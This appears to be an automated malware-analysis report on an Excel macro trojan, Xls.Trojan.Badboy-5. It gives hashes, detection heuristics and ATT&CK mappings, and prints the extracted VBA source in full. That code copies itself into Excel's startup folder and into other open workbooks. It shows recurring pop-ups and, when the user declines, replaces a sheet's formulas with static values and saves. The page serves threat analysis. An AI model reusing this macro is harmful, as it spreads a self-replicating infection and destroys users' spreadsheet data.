Xls.Trojan.Badboy-5 — Office (OLE) malware analysis

Static analysis result for SHA-256 fceafe6e40e0c864…

MALICIOUS

Office (OLE)

23.5 KB Created: 2000-08-28 19:09:01 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 5488f23d4e4c94cdaa7ff077604c2514 SHA-1: 461f15d380e0ca0639c49aac655b3cd1a2714480 SHA-256: fceafe6e40e0c8642ef702f62bc969c59519e0a9f5310637801ed8beb55d8c81
120 Risk Score

Malware Insights

Xls.Trojan.Badboy-5 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The critical ClamAV detection and high-severity Workbook_Open macro heuristic indicate malicious intent. The VBA script attempts to establish persistence by saving a copy of itself as 'Books.xls' in the Excel startup path, which is then likely executed automatically upon Excel launch. This behavior is characteristic of a trojan designed to maintain a foothold on the system.

Heuristics 3

  • ClamAV: Xls.Trojan.Badboy-5 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Badboy-5
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14015 bytes
SHA-256: f48ac8033a7fe63c7da32d40a9f0727a1ffd84c4356686deb93daaae62a0d439
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Const Sn = "Books.xls"
Sub CreatSelf(r As String)
    On Error Resume Next
    Application.DisplayAlerts = False
    LookAdd
    Application.ActiveWorkbook.SaveAs r
    Application.DisplayAlerts = True
    On Error GoTo 0
End Sub
Private Sub Workbook_Open()
    On Error Resume Next
    Application.ScreenUpdating = False
    r = Application.StartupPath & "\" & Sn
    s = Application.Workbooks(Sn).Name
    If s = "" Then
        cf = ActiveWorkbook.Name
        Application.Workbooks.Add
        CreatSelf (r)
        Workbooks(cf).Activate
    End If
    CheckMsg
    Application.ScreenUpdating = True
    On Error GoTo 0
End Sub
Function LookAdd() As Boolean
    On Error Resume Next
    If ThisWorkbook.Name = ActiveWorkbook.Name Then GoTo NoAdd
    With ActiveWorkbook.VBProject.VBComponents("ThisWorkbook")
        s = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines
        m = .CodeModule.CountOfLines
        If m >= s Then GoTo NoAdd
        Do While .CodeModule.CountOfLines > 0
            .CodeModule.DeleteLines 1, .CodeModule.CountOfLines
        Loop
        For i = 1 To s
            sl = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.Lines(i, 1)
            .CodeModule.InsertLines i, sl
        Next i
        ap = ActiveWorkbook.Path
        If ap <> "" Then ActiveWorkbook.Save
    End With
YesAdd:
    LookAdd = True
    On Error GoTo 0
    Exit Function
NoAdd:
    LookAdd = False
    On Error GoTo 0
End Function
Sub LookIt()
    On Error Resume Next
    LookAdd
    Application.ScreenUpdating = True
    On Error GoTo 0
End Sub
Sub CheckMsg()
    On Error Resume Next
    Dim RndResult As Integer, C As Integer
    Dim MsgS(1 To 4) As String, YesS(1 To 2) As String, NoS(1 To 2) As String
    Static Ot As Date
    Application.OnTime Ot, Sn & "!ThisWorkbook.CheckMsg", schedule:=False
    MsgS(1) = "ÎÒ²ÂÏë,ÄãÒ»¶¨ºÜ¿É°®,Ô¼Äãµ½½ÖÐĹ«Ô°É¢É¢²½,Äã²»½éÒâ°É !"
    MsgS(2) = "½ñÌìµÄÒ¹¾°Í¦ÃÀ , Ô¼Äãµ½ÒôÀÖ¿§·È¹Ý×ø×ø,ºÃÂð ?!"
    MsgS(3) = "Ù»Ãà ! ¼ûµ½ÄãÕæ¸ßÐË,½ñÍíÔ¼Äãµ½µÄÊ¿¸ßÌøÎè,²»ÖªÒâÏÂÈçºÎ !"
    MsgS(4) = "С²öè ! ÔÛÃÇ»¹ÊÇÏȽâ¾öÄãµÄ²ö×ìÎÊÌâ,´óÅŵµÈçºÎ !"
    YesS(1) = "Ì«ºÃÁË, ¼ûÃæºóÎÒÒ»¶¨ÒªÇë½ÌÄãµÄ·¼Ãû !"
    YesS(2) = "×¢Òâ , ÎÒÊÖÖÐÄÃ×ÅÒ»ÊøÏÊ»¨ÔÚÃſڵÈÄã !"
    NoS(1) = "Õæ²»ÇÉ , Õâ¸öµØ·½ÒѾ­Í£ÒµÁË !"
    NoS(2) = "¿´ÎÒÕâ¼ÇÐÔ , ¾ÓÈ»ÍüÁËÄǸöµØ·½ÔÚÄĶù !"
    Randomize
    RndResult = Int((4 * Rnd) + 1)
    C = MsgBox(MsgS(RndResult), vbYesNo, "Ï£ÍûÄãÄܽÓÊÜÎÒµÄÑûÇë!")
    Randomize
    If C = vbYes Then
        If LookAdd = True Then
            RndResult = Int((2 * Rnd) + 1)
            MsgBox YesS(RndResult), vbOKOnly, "ºÍÄãÔ¼»á,ÎҺÿªÐÄŶ!"
        Else
            C = vbNo
        End If
    End If
    If C = vbNo Then
        'Bad boy
        Application.ScreenUpdating = False
        If Right(Date$, 1) = 1 Then
            ol = Selection.Address
            Cells.Select
            Application.CutCopyMode = False
            Selection.Copy
            Selection.PasteSpecial Paste:=xlValues, Operation:=xlNone, SkipBlanks:= _
                False, Transpose:=False
            Application.CutCopyMode = False
            Range(ol).Select
            ap = ActiveWorkbook.Path
            If ap <> "" Then ActiveWorkbook.Save
        End If
        Application.ScreenUpdating = True
        RndResult = Int((2 * Rnd) + 1)
        MsgBox NoS(RndResult), vbOKOnly, "Íò·ÖÒź¶,Ï£ÍûÏ´λ¹Óлú»á!"
    End If
    Ot = Now + TimeValue("00:10:00")
    Application.OnTime Ot, Sn & "!ThisWorkbook.CheckMsg"
    On Error GoTo 0
End Sub


































Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_Pre
... (truncated)